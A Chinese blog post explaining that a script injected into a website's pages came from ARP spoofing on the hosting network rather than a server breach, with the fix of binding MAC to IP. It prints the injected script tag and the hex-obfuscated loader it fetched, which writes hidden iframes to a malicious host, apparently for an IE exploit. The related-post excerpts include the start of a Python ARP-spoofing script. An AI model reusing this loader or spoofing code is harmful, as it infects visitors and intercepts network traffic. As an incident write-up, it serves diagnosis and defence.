网站被黑的假象--ARP欺骗之页面中加入一段js

昨天晚上发现访问我的网站的时候网页代码html的前面多了一串js代码。刚开始以为网站被黑了,赶紧到服务器上查看所有文件是否带有这串js代码,搜索结果没有,而且服务器也没发现被入侵的痕迹。
<script src=http://fuck.ns2go.com/dir/index_pic/1.js></script>

于是只能从这段代码入手,我下载这个js开发发现是下面一段代码:


代码如下:

window["\x64\x6f\x63\x75\x6d\x65\x6e\x74"]["\x77\x72\x69\x74\x65\x6c\x6e"]("\x3c\x44\x49\x56 \x73\x74\x79\x6c\x65\x3d\"\x43\x55\x52\x53\x4f\x52\x3a \x75\x72\x6c\x28\'\x68\x74\x74\x70\x3a\/\/\x66\x75\x63\x6b\x2e\x6e\x73\x32\x67\x6f\x2e\x63\x6f\x6d\/\x64\x69\x72\/\x69\x6e\x64\x65\x78\x5f\x70\x69\x63\/\x31\x2e\x67\x69\x66\'\x29\"\x3e"); 
window["\x64\x6f\x63\x75\x6d\x65\x6e\x74"]["\x77\x72\x69\x74\x65\x6c\x6e"]("\x3c\x44\x49\x56 \x73\x74\x79\x6c\x65\x3d\"\x43\x55\x52\x53\x4f\x52\x3a \x75\x72\x6c\x28\'\x68\x74\x74\x70\x3a\/\/\x66\x75\x63\x6b\x2e\x6e\x73\x32\x67\x6f\x2e\x63\x6f\x6d\/\x64\x69\x72\/\x69\x6e\x64\x65\x78\x5f\x70\x69\x63\/\x32\x2e\x67\x69\x66\'\x29\"\x3e\x3c\/\x44\x49\x56\x3e\x3c\/\x44\x49\x56\x3e"); 
window["\x64\x6f\x63\x75\x6d\x65\x6e\x74"]["\x77\x72\x69\x74\x65\x6c\x6e"]("\x3c\x69\x66\x72\x61\x6d\x65 \x73\x72\x63\x3d\x68\x74\x74\x70\x3a\/\/\x66\x75\x63\x6b\x2e\x6e\x73\x32\x67\x6f\x2e\x63\x6f\x6d\/\x64\x69\x72\/\x69\x6e\x64\x65\x78\x5f\x70\x69\x63\/\x30\x36\x30\x31\x34\x2e\x68\x74\x6d \x77\x69\x64\x74\x68\x3d\x31 \x68\x65\x69\x67\x68\x74\x3d\x31\x3e\x3c\/\x69\x66\x72\x61\x6d\x65\x3e"); 
window["\x64\x6f\x63\x75\x6d\x65\x6e\x74"]["\x77\x72\x69\x74\x65\x6c\x6e"]("\x3c\x69\x66\x72\x61\x6d\x65 \x73\x72\x63\x3d\x68\x74\x74\x70\x3a\/\/\x66\x75\x63\x6b\x2e\x6e\x73\x32\x67\x6f\x2e\x63\x6f\x6d\/\x64\x69\x72\/\x69\x6e\x64\x65\x78\x5f\x70\x69\x63\/\x74\x6a\x2e\x68\x74\x6d \x77\x69\x64\x74\x68\x3d\x30 \x68\x65\x69\x67\x68\x74\x3d\x30\x3e\x3c\/\x69\x66\x72\x61\x6d\x65\x3e")

在google上搜索发现有人已经发现同样情况.http://0e2.net/post/676.html
看了这篇文章之后了解到不是服务器被黑了,而是服务器所在的机房内网有中木马病毒的主机在搞arp欺骗.
这些木马捕抓了我的服务器发送出来的报文之后,篡改了报文的内容,在html头加入了前面那段木马病毒代码.然后再转发给访问我网站的用户主机.这段木马是针对ie的ani漏洞的,微软用户的电脑要赶紧升级打补丁.
最后问题就在于如何让我的服务器防止被ARP欺骗.打电话到机房,技术人员让我们将mac和ip地址绑定,问题终于解决.
关于ARP欺骗相关知识:
http://zhidao.baidu.com/question/7980952.html?si=1

(0)

相关推荐

  • 网站被黑的假象--ARP欺骗之页面中加入一段js

    昨天晚上发现访问我的网站的时候网页代码html的前面多了一串js代码.刚开始以为网站被黑了,赶紧到服务器上查看所有文件是否带有这串js代码,搜索结果没有,而且服务器也没发现被入侵的痕迹. <script src=http://fuck.ns2go.com/dir/index_pic/1.js></script> 于是只能从这段代码入手,我下载这个js开发发现是下面一段代码: 复制代码 代码如下: window["\x64\x6f\x63\x75\x6d\x65\x6e\x

  • 网站源文件被注入了&lt;iframe&gt;代码—ARP欺骗的木马病毒攻击

    最近我的网站突然出现访问的迟钝,并且打开之后杀毒软件立即提示含有木马病毒. 我就很纳闷,运行了4年的网站一直都好好的最近怎么出现病毒提示呢.职业习惯原因打开了网站的源代码查看,原来在网页源代码的头部被加入了<iframe>嵌套框架网页,该网页执行木马程序-- 按照常理我心中一寒:估计是服务器被人攻陷了,所有文件代码被加了此行代码,于是FTP上去,下载文件下来查看却没有该代码. 于是询问服务器管理员含笑,他一听就说:"是中ARP欺骗的病毒攻击了". 那么什么是"AR

  • 使用JAVA通过ARP欺骗类似P2P终结者实现数据封包监听

    如果说最近有什么不爽的事情,那就是与人共享网络的痛苦了,特别是当其他共享者使用那些P2P工具下载软件,而你却看着网页进度条一点点爬的时候,那种痛苦对于我这种网虫级别的人来说,那简直就是痛不欲生.绝对不能再忍了,于是乎上网下载P2P终结者,哼,你们不仁我则不义,看谁厉害.软件下好后,立刻启动监控,然后尝试了下速度,哇,那个爽啊.可惜好景不长,没多久对方就跑来问我为什么他们断网了?我楞了一下,那垃圾软件居然连对方的网都断了,于是支支唔唔的应付了他,说我看下,总算勉强过关,还好他们不懂电脑,不然就掉大

  • 局域网遭遇ARP欺骗攻击的解决方法

    该病毒发作时症状表现为: 1)计算机网络连接正常,但无法上网或者时通时断,经常掉线: 2)用户私密信息(如QQ.网游等帐号)被窃取: 3)局域网内出现网络拥塞,甚至造成一些网络设备当机: 基本概念: 为了能够说明问题,有必要先来介绍一些基本概念,知者略过. 首先来说IP地址,大家应该都很熟悉了,我们知道,IP地址是一段32位(二进制)的无符号整数,例如:192.168.110.1,其最基本的作用就是在(IP)网络中唯一标识一台特定的主机.在Internet上,我们正是凭借IP地址来定位其他主机或

  • 用户网站被黑,您的服务器是否安全?

    以下文章为星外科技版权所有,有少量用户一遇到网站被黑,就马上认为是星外平台造成的.这是一种误解. 因为如果是客户的网站代码有问题,星外的平台是无法解决的,谁也帮不了这个用户.这是因为,黑客利用用户网站的漏洞,使用合法代码来修改用户网页,造成了网页被插入代码,这种情况谁也无法防止.因为木马变种太多,很多是用合法操作的.正如您把钥匙给了别人来开您自己的门是一样的道理.例如洞网的漏洞使用的就是合法的代码入侵,这种情况是任何人都无法防止,但是平台可以保证只影响单个网站,不影响整台服务器. 您的服务器是否

  • python使用arp欺骗伪造网关的方法

    本文实例讲述了python使用arp欺骗伪造网关的方法.分享给大家供大家参考.具体实现方法如下: #coding:utf-8 ''' arp欺骗局域网pc,将伪造的网关mac以网关的arp应答发送给pc ''' from scapy.all import ARP,send,arping import sys,re stdout=sys.stdout IPADDR="192.168.1.*" gateway_ip='192.168.1.1' #伪造网关mac地址 gateway_hw='

  • 解决http://16a.us/2.js之arp欺骗的方法附专杀工具

    公司局域网访问所有页面都加上了<script src=http://16a.us/2.js></script>代码, 这次是客户端打开的所有网页,故可排除是服务器环境遭遇arp欺骗,综合网上各方意见,得出结论:本地网关或dns被劫持,修复本地连接后故障消除. 根本解决方法,绑定网关mac地址,方法为: 命令行输入arp -s 网关IP 网关MAC 关于网关MAC,可使用arp命令查询. 如果是dns被劫持,则更改dns服务器. 关于js加密解密的两篇文章,想研究上面病毒脚本的朋友可

  • arp欺骗的原理介绍与什么是ARP和防范ARP欺骗第1/3页

    什么是ARP?如何防范ARP欺骗技术? 什么是ARP?如何防范ARP欺骗技术? 首先说一下什么是ARP.如果你在UNIX Shell下输入 arp -a (9x下也是),你的输出看起来应该是这样的: Interface: xxx.xxx.xxx.xxx Internet Address Physical Address Type xxx.xxx.xxx.xxx 00-00-93-64-48-d2 dynamic xxx.xxx.xxx.xxx 00-00-b4-52-43-10 dynamic

  • 您用户网站被黑的原因和解决办法

    您的用户网站被黑,有以下几种原因造成的: 1. 是您的客户的网站代码有问题,存在安全漏洞造成的. 如果您的服务器上大部分用户的网站都正常,只有少量用户网站被黑,那  么就很可能是您少量用户网站被黑的网站代码有问题,存在安全漏洞造  成的.造成这个问题是没有办法解决,也不是您的责任. 分析说明: 1). 大家都知道,"虚拟主机提供商"对自己的每个虚拟主机用户  都分配了FSO文件操作的权限,他们通过您分配的合法权限,可  以任意改动和上传的任何文件.如果您的用户没有保护好您分  配给他们

  • 服务器的ARP欺骗攻击的防范的两种解决方法

    服务器的ARP欺骗攻击的防范          这些天我的服务器几乎天天都被人ARP欺骗攻击,网页被挂木马,实在烦死了,深圳的龙岗电信机房实在是够恶心的,不得已,我只好寻找一些防范ARP攻击的方法,目前发现可以使用静态地址法和使用专用软件的方法来防范ARP欺骗攻击. 静态地址法指的是,在本地服务器上,将路由器的MAC地址设置为静态的方式来阻止别人对我的ARP攻击,如果你也越到了类似的ARP欺骗攻击,也可以参考这个方法进行设置. 首先,找到路由器真实的MAC地址,在没有被攻击的条件下,输入命令ar

随机推荐